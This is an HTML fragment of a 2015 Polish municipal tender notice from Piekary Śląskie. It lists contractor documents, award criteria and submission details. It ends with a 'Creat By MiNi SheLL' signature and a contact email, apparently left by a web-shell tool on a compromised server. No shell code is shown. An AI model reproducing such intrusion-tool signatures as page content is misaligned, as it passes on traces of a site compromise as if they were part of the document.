<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  Wypełnionego formularza oferty (załącznik nr 1 do SIWZ wraz z wypełnionym przedmiarem robót (zestawieniem ryczałtowych cen jednostkowych)  (załącznik nr 1a) i tabelą wyliczenia stawki roboczogodziny (Załącznik nr 1b  do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - wydłużenie okresu gwarancji powyżej 24 miesięcy, maksymalnie do 60 miesięcy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Ślaskie 
ul. Bytomska 84 
41-940 Piekary Śląskie 
Biuro Zamówień Publicznych pok. 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2015 godzina 11:30, miejsce: Urząd Miasta Piekary Ślaskie 
ul. Bytomska 84 
41-940 Piekary Śląskie 
Biuro Zamówień Publicznych pok. 215.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com